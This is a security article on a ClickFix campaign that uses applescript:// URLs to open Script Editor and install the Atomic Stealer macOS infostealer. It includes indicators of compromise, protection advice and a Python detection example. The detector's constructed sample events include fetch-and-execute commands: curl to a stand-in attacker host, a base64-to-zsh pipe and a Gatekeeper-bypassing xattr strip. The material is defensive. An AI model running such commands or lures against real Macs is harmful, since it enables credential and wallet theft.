Atomic Stealer Pivots to Script Editor After Apple Blocks Terminal
ClickFix attackers bypass macOS 26.4 Terminal paste scanning by using applescript:// URLs to launch Script Editor. Same payload, new delivery vector.
Apple's macOS 26.4 update added paste scanning to Terminal, specifically to disrupt ClickFix-style attacks that trick users into copying and executing malicious commands. Attackers adapted within weeks. Jamf Threat Labs documented a new campaign that delivers Atomic Stealer through Script Editor instead—completely bypassing Terminal's new protections.
The evolution demonstrates how quickly threat actors iterate on delivery mechanisms when defenses improve. The payload remains the same; only the execution path changed.
How the Attack Works
Traditional ClickFix attacks on macOS presented users with fake error messages instructing them to copy a command and paste it into Terminal. Apple recognized this pattern and added scanning that warns users before potentially dangerous pasted commands execute.
The new campaign sidesteps Terminal entirely using the applescript:// URL scheme:
applescript://com.apple.scripteditor?action=new&script=[encoded payload]
When a user clicks a link containing this URL, their browser prompts them to allow Script Editor to open. If they approve, Script Editor launches with a pre-populated script ready to execute. No Terminal involvement, no paste scanning.
The attack flow:
- User visits a fake Apple-themed page claiming to offer disk cleanup
- Clicking "Execute" triggers the applescript:// URL
- Browser asks permission to open Script Editor
- Script Editor opens with obfuscated code already loaded
- macOS 26.4+ shows an "unidentified developer" warning
- User runs the script anyway
- Script downloads and executes Atomic Stealer
The Payload: Atomic Stealer (AMOS)
Atomic Stealer remains one of the most capable macOS infostealers. The malware targets:
- Keychain credentials and passwords
- Browser cookies, autofill data, and stored credit cards
- Cryptocurrency wallet extensions
- Desktop files and documents
- System information for fingerprinting
This campaign delivers the same Atomic Stealer binary we've tracked in previous campaigns. The attackers didn't need to modify their malware—they only changed how they get victims to execute it.
The connection to broader infostealer trends is clear. Microsoft recently warned about infostealers expanding beyond Windows to target macOS and using cross-platform delivery techniques. ClickFix has been particularly effective because it exploits user behavior rather than software vulnerabilities.
Technical Obfuscation
The Script Editor payload uses multiple layers of encoding to evade detection:
- String transformation - Uses the tr utility to convert obfuscated strings into valid URLs at runtime
- Base64 + gzip compression - Conceals second-stage shell commands before execution
- Inline execution - Downloaded payloads pipe directly to zsh without touching disk
The script masquerades as a "macOS Storage Optimization" utility, claiming it will remove caches, logs, and other clutter. Users who run it expecting system cleanup instead get their credentials stolen.
Once executed, the script:
- Downloads a binary to /tmp/helper
- Strips extended attributes with xattr -c to bypass Gatekeeper
- Grants execution permissions
- Runs the Atomic Stealer payload
Indicators of Compromise
| Type | Indicator |
|---|---|
| Domain | dryvecar[.]com |
| URL | storage-fixes.squarespace[.]com |
| URL | cleanupmac.mssg[.]me |
| SHA256 | 3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44 |
The Squarespace and mssg.me hosting is notable—attackers frequently abuse legitimate platforms for initial delivery before redirecting to infrastructure they control.
Why Script Editor?
The shift to Script Editor makes sense from an attacker's perspective:
- Bypasses Terminal protections - Apple's paste scanning doesn't apply
- Lower friction - Users may trust Script Editor more than Terminal
- Pre-populated execution - No manual pasting required
- Same social engineering - The fake webpage approach still works
This is tactical evolution, not strategic change. The underlying ClickFix technique—using fake technical problems to convince users to execute attacker-controlled code—remains effective. Apple blocked one execution path, so attackers found another.
Protection Recommendations
For individual Mac users:
- Never run scripts from websites - Legitimate disk cleanup doesn't require pasting code
- Distrust browser prompts to open applications - Especially Script Editor or Terminal
- Keep macOS updated - The 26.4 warnings provide some protection
- Use reputable security tools - EDR solutions can detect Atomic Stealer behavior
For organizations managing Mac fleets:
- Block applescript:// URL handling - MDM policies can prevent this attack vector
- Monitor Script Editor execution - Unusual Script Editor activity from browser contexts is suspicious
- Deploy endpoint detection - Look for the known IOCs and behavioral patterns
- Train users on ClickFix tactics - Recognition prevents execution
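The "Monitor Script Editor execution" recommendation and the Technical Obfuscation section above map onto three observable stages: Script Editor opened from a browser, decoded content piped into zsh, and xattr -c on a /tmp binary followed by its execution. The rules below are an added example, not from Jamf's report or any real EDR product; the event schema, the launched_by attribution field, the process names and every command line are constructed for illustration.

```python
"""Toy detection rules for the Script Editor ClickFix chain described in the article.
Added example: the ProcEvent schema, the launched_by field and all sample command
lines are constructed and do not come from Jamf's report or a real EDR schema."""
import re
from dataclasses import dataclass

BROWSERS = {"Safari", "Google Chrome", "Firefox", "Brave Browser"}

@dataclass
class ProcEvent:
    pid: int
    launched_by: str  # process credited with requesting the launch (constructed field)
    name: str         # short process/app name
    cmdline: str      # full command line as recorded

PIPE_TO_SHELL = re.compile(r"\|\s*(zsh|bash|sh)\b")
DECODE_OR_FETCH = re.compile(r"\bbase64\s+(-[dD]|--decode)\b|\bgunzip\b|\bcurl\b")
XATTR_STRIP = re.compile(r"\bxattr\s+-c\s+(/(?:private/)?tmp/\S+)")

def detect(events):
    """Return (rule, pid) hits; one rule per stage the article describes."""
    hits = []
    stripped = set()  # /tmp paths whose extended attributes were cleared
    for e in events:
        # Stage 1: Script Editor opened from a browser (the applescript:// handoff)
        if e.name == "Script Editor" and e.launched_by in BROWSERS:
            hits.append(("script_editor_from_browser", e.pid))
        # Stage 2: decoded or downloaded content piped straight into a shell
        if PIPE_TO_SHELL.search(e.cmdline) and DECODE_OR_FETCH.search(e.cmdline):
            hits.append(("decode_or_fetch_piped_to_shell", e.pid))
        # Stage 3: xattr -c on a /tmp binary, then that same binary executed
        m = XATTR_STRIP.search(e.cmdline)
        if m:
            stripped.add(m.group(1))
        tokens = e.cmdline.split()
        if tokens and tokens[0] in stripped:
            hits.append(("exec_after_xattr_strip", e.pid))
    return hits

SE = "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"
# Constructed telemetry: one malicious chain (pids 101-106) plus two benign events.
SAMPLE_EVENTS = [
    ProcEvent(101, "Safari", "Script Editor", SE),
    ProcEvent(102, "Script Editor", "zsh", "zsh -c 'echo H4sIAAAA... | base64 -d | gunzip | zsh'"),
    ProcEvent(103, "zsh", "curl", "curl -fsSL https://attacker.example/helper -o /tmp/helper"),
    ProcEvent(104, "zsh", "xattr", "xattr -c /tmp/helper"),
    ProcEvent(105, "zsh", "chmod", "chmod +x /tmp/helper"),
    ProcEvent(106, "zsh", "helper", "/tmp/helper"),
    ProcEvent(201, "Finder", "Script Editor", SE),            # user opened it normally
    ProcEvent(202, "Terminal", "xattr", "xattr -c /tmp/build.log"),  # cleared, never executed
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid}")
```

Stage 3 is stateful on purpose: an xattr -c alone (pid 202) is common developer noise, so the rule only fires when the same path is later executed.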
The Bigger Picture
ClickFix attacks have proven remarkably resilient. We've covered variants targeting Chrome extensions and enterprise browser crashes. Each time defenders block a technique, attackers adapt.
The lesson isn't that defenses are futile—Apple's Terminal protection forced attackers to find an alternative, which creates new detection opportunities. But single-point defenses won't stop determined operators. Effective protection requires layered controls: user education, endpoint detection, network monitoring, and application restrictions working together.
Script Editor isn't the last alternative. If Apple hardens applescript:// URL handling, attackers will find another path. The cat-and-mouse continues.